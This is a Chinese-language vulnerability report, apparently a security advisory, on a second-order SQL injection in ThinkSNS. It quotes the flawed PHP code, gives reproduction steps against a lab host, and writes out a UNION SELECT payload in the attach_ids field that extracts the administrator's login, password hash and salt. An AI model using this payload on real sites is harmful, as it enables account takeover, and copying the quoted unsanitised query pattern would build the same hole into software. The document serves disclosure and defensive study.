<ul><li>/apps/public/Lib/Action/AccountAction.class.php</li></ul><pre class=""> public function doAuthenticate(){ $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find(); $data['usergroup_id'] = intval($_POST['usergroup_id']); if(!$data['usergroup_id']) $data['usergroup_id'] = 5; …… //$data['info'] = t($_POST['info']); $data['attach_id'] = t($_POST['attach_ids']); if(D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()){ $data['user_verified_category_id'] = intval($_POST['verifiedCategory']); }else{ $data['user_verified_category_id'] = 0; } …… if($verifyInfo){ $data['verified'] = 0; $res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data); }else{ $data['uid'] = $this->mid; $res = D('user_verified')->add($data); } …… } </pre><p>attach_ids存入数据库。</p><pre class=""> public function authenticate(){ $auType = model('UserGroup')->where('is_authenticate=1')->findall(); $this->assign('auType',...
<ul><li>/apps/public/Lib/Action/AccountAction.class.php</li></ul><pre class=""> public function doAuthenticate(){ $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find(); $data['usergroup_id'] = intval($_POST['usergroup_id']); if(!$data['usergroup_id']) $data['usergroup_id'] = 5; …… //$data['info'] = t($_POST['info']); $data['attach_id'] = t($_POST['attach_ids']); if(D('user_verified_category')->where('pid='.$data['usergroup_id'])->find()){ $data['user_verified_category_id'] = intval($_POST['verifiedCategory']); }else{ $data['user_verified_category_id'] = 0; } …… if($verifyInfo){ $data['verified'] = 0; $res = D('user_verified')->where('uid='.$verifyInfo['uid'])->save($data); }else{ $data['uid'] = $this->mid; $res = D('user_verified')->add($data); } …… } </pre><p>attach_ids存入数据库。</p><pre class=""> public function authenticate(){ $auType = model('UserGroup')->where('is_authenticate=1')->findall(); $this->assign('auType', $auType); $verifyInfo = D('user_verified')->where('uid='.$this->mid)->find(); if($verifyInfo['attach_id']){ $a = explode('|', $verifyInfo['attach_id']); foreach($a as $key=>$val){ if($val !== ""){ $verifyInfo['attachment'] .= D('attach')->where("attach_id=$a[$key]")->getField('name').'&nbsp;<a href="'.U('widget/Upload/down',array('attach_id'=>$a[$key])).'" target="_blank">下载</a><br />'; } } } </pre><p>分割attach_ids然后带入SQL语句查询,由于上述attach_ids可控,导致二次注入的发生。</p><p>注册帐号并登陆,访问网址:</p><pre class="">http://10.211.55.12/thinksns/index.php?app=public&mod=Account&act=Authenticate</pre><p>填写必要字段,然后上传任意图片,修改attach_ids为:</p><pre class="">|77|-1 un<a>ion se<a>lect co<a>ncat(login,0x23,password,0x3a,login_salt) fr<a>om ts_user li<a>mit 1#<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" src="https://images.seebug.org/@/uploads/1434093460362-2CCA9FB7-2B39-4037-98B8-741B5E776EAC.png" data-image-size="821,662"><br></p><p>点击提交,再次访问上述网址,得到管理员账号以及密码:</p><p> </p><p><img alt="3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" src="https://images.seebug.org/@/uploads/1434093481265-3A396FFB-FD9C-44EC-B411-8AF9ADD7726A.png" data-image-size="720,201"><br></p>
